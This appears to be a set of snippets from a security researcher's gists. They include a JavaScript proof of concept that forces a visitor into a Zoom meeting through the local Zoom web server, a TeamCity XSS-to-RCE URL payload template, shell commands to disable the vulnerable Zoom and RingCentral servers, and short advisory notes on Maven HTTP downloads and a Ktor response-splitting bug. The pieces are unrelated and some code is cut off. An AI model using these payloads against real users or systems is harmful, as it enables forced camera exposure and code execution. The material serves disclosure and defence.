| <body> | |
| <script> | |
| // It's actually better if this number isn't a valid zoom number. | |
| var attackNumber = "694138052" | |
| setInterval(function(){ | |
| var image = document.createElement("img"); | |
| // Use a date to bust the browser's cache | |
| var date = new Date(); | |
| image.src = "http://localhost:19421/launch?action=join&confno=" + attackNumber + "&" + date.getTime(); |
| <iframe src="https://zoom.us/j/492468757"/> |
| rm -rf ~/.zoomus | |
| touch ~/.zoomus |
| # For just your local account | |
| defaults write ~/Library/Preferences/us.zoom.config.plist ZDisableVideo 1 | |
| # For all users on the machine | |
| sudo defaults write /Library/Preferences/us.zoom.config.plist ZDisableVideo 1 |
| # To prevent the vulnerable server from running on your machine | |
| # (this does not impact Zoom functionality), run these two lines in your Terminal. | |
| pkill "ZoomOpener"; rm -rf ~/.zoomus; touch ~/.zoomus && chmod 000 ~/.zoomus; | |
| pkill "RingCentralOpener"; rm -rf ~/.ringcentralopener; touch ~/.ringcentralopener && chmod 000 ~/.ringcentralopener; | |
| # (You may need to run these lines for each user on your machine.) |
This POC demonstrates taking advantage of a XSS vulnerability in TeamCity allowing an attacker to achieve Remote Code Execution on a build agent if the victim has the ability to add steps to a CI job.
The POC can be simplified to the following URL:
https://[domain.com]/project.html?projectId=[target_project_id]&tab=problems%27%7D)%3B%7D)()%3B[JS_PAYLOAD]
This document captures the links to all of the different artifact server hosts that have announced they will be formally depricating downloading dependencies over HTTP and will only be supporting HTTPS starting in January 2020.
Want to take over the Java ecosystem? All you need is a MITM!
If this is your first time using GitHub Security Advisories, please allow me to guide you through how they work.
As of September 17th, 2019, when advisories are published, the entire discussion within the advisory will not be made public. Any information you want to provide to the public should be included in the advisory body.
This is just a simple location I'm using to keep a running list of vulnerabilities I've discovered or have participated in the discovery of.
I decided to move this to Google Sheets. Too complicated to keep the formatting straight here: https://docs.google.com/spreadsheets/d/1Qj0gpocVWLYarIoYZmT-vCwWmZC6kXZ3DdNV_lPmXcc/edit?usp=sharing
The Ktor Coroutine based I/O Server implementation io.ktor.client.engine.cio.CIO is vulnerable to HTTP Response Splitting.
This vulnerability is fixed in Ktor version 1.2.6.